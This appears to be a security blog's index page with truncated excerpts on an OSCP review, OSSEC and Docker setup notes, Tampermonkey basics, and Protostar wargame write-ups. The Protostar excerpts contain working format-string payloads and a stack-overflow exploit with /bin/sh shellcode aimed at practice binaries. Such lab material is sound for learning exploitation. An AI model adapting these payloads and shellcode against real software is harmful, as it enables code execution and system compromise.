OSCP Course Review 09/2017

In this month, i have finished my OSCP course, and i had some review about course and exam:
Before start lab, i had some preparing:
- I am pentester with more than 5 year experience.
- I am CTF player: web and pwnable is my category.
- Some experience with Software Exploit (Corelan and RPISEC course).
- Tried with some free lab.
After register, you will be received: PDF + Video material, VPN account to connect OSCP Lab. I used pdf only. In OSCP Lab, you had more than 50s machines to exploit. Some machine too easy, but some machine, you need "Try Harder". I get root more than 40s machine in first month, and spent two weeks to prepare OSCP exam. I used one week to complete my OSCP lab exercises and write lab report (to get 5 point bonus)
I had 24 hours to compromise a range of machine (5 machine). After first 3 hours, i compromise 3 machine. Next 6 hours to get 4th machine (1 hours to get limited shell and 5 hours to get root). After sleep, i start wr…

Experience in folder monitoring with OSSEC

Today i had some job relate to folder monitoring. In my solution, i have selected OSSEC with ELK. I have spent 5 hour to troubleshooting OSSEC. :)). This it first time i config it.
You can use syscheck to folder monitoring. Reference in: and
To monitor file edit, delete you can use syscheck with realtime monitor.
But to monitor  file added, you need:
Add to local_rule.xml
Edit ossec.conf:

Main problem is: you must edit ossec.conf in server (in my case is wazuh), not windows client.  Second problem, after integrity change more than 3 times, ossec disable alert. You must add auto_ignore is no in syscheck (on server). This is my result: ----------------------------------------------------------
Thanks for reading
Security Research
SecurityLab - Linux Lab -- Window and Cisco Lab
to be continued -…

Exploit Exercises - Format String

Padding to last mem dump
run `python -c 'print "\x38\x96\x04\x08"+"AAABB"+"%x."*143'`%x
run `python -c 'print "\x38\x96\x04\x08"+"AAABB"+"%x."*143'`%n
/opt/protostar/bin/format1 `python -c 'print "CC"+"\x38\x96\x04\x08"+"AAA%142$n"'`
Format2 need write value to address:
python -c 'print "\xe4\x96\x04\x08%42x"+"%x."*2+"%n"' > foo

python -c 'print "\xe4\x96\x04\x08"+"%60u%4$n"'  |  /opt/protostar/bin/format2

Format3: write 4 byte with speacify address: POC: python -c 'print "\xf4\x96\x04\x08"+"%x"*10+"%11x%n"+"BB"+"\xf5\x96\x04\x08"+"%x"*6+"%475x%n"+"B"+"\xf6\x96\x04\x08"+"%x"*4+"%136x%n"+"B"+"\xf7\x96\x04\x08"+"%x&qu…

Exploit Exercises - Protostar Stack 7

In this level, app check return address not start with 0xbxxxxxxx. So i pop pop ret to load return address to stack, and call it.
Found pop pop ret at: 0x08048492
This payload:
| "A" * 80 | address | 8 bytes junk | | NOP to bit shifing | Shell code |
This is shell code:
Load poc to gdb, debug, break point, etc... I found nop shell start at: 0xbffff698. Ok build poc:
(python -c 'print "A"*80 + "\x92\x84\x04\x08" + "C"*8 + "\x98\xf6\xff\xbf" + "\x90"*40 +"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"';cat) And run it:
(python -c 'print "A"*80 + "\x92\x84\x04\x08" + "C"*8 + "…

Exploit Exercises - Protostar Stack 6

It is free time - I had some time to play exploit-exercises. Today i play at stack level 6. I learned some experience for me, with return to lib.
Use gdb, disassembly:
#gdb -q /opt/protostar/bin/stack6  (gdb) disas main
Dump of assembler code for function main:
0x080484fa :    push   %ebp
0x080484fb :    mov    %esp,%ebp
0x080484fd :    and    $0xfffffff0,%esp
0x08048500 :    call   0x8048484
0x08048505 :   mov    %ebp,%esp
0x08048507 :   pop    %ebp
0x08048508 :   ret  
End of assembler dump.  (gdb) disas getpath
Dump of assembler code for function getpath:
0x08048484 : push   %ebp
0x08048485 : mov    %esp,%ebp
0x08048487 : sub    $0x68,%esp
0x0804848a : mov    $0x80485d0,%eax
0x0804848f :        mov    %eax,(%esp)
0x08048492 :        call   0x80483c0
0x08048497 :        mov    0x8049720,%eax
0x0804849c :        mov    %eax,(%esp)
0x0804849f :        call   0x80483b0
0x080484a4 :        lea    -0x4c(%ebp),%eax
0x080484a7 :        mov    %eax,(%esp)
0x080484aa :        call   0x8048380
0x080484af :…

Some experience when use Docker

In this week, my job is set up ELK with Suricata. I choose docker is platform to run all. Now, i had some experience about docker.
Use docker-compose. It is very good deployment for production, build && run.
Install docker-compose via pip.
Use build image to create your custom start-up distro.
I used docker compose version 2 syntax, notice different with version, like network and net
Use network --net if you need monitor, or use all card
You can not use cd command, must use WORKDIR. Read Dockerfile document very carefully.
Use links, when use it, it run links container before. You can run manual, and start main container after. Must sure it started.
In docker command, must use command to hold tty, like: suricata -c xxx or python manager server
Thanks for reading
Security Research
SecurityLab - Linux Lab -- Window and Cisco Lab
to be conti…

Tampermonkey HelloWorld and create menuCommand

Today, i need write one script with tampermonkey. It is very hard :(.
To write helloworld. Create new script.
Edit config: Add
// @connect      *
// @match        http://*/*
// @match        https://*/*
You can edit author, homepage, etc..
Add your code in main code in comment. I used console.log()
 This is result:
I need create button in menu, so i used:
Edit config, remove grant none and add: // @grant        GM_registerMenuCommand

You will see new menu button in tamper monkey.
Thanks for reading
Security Research
SecurityLab - Linux Lab -- Window and Cisco Lab
to be continued - I will update more.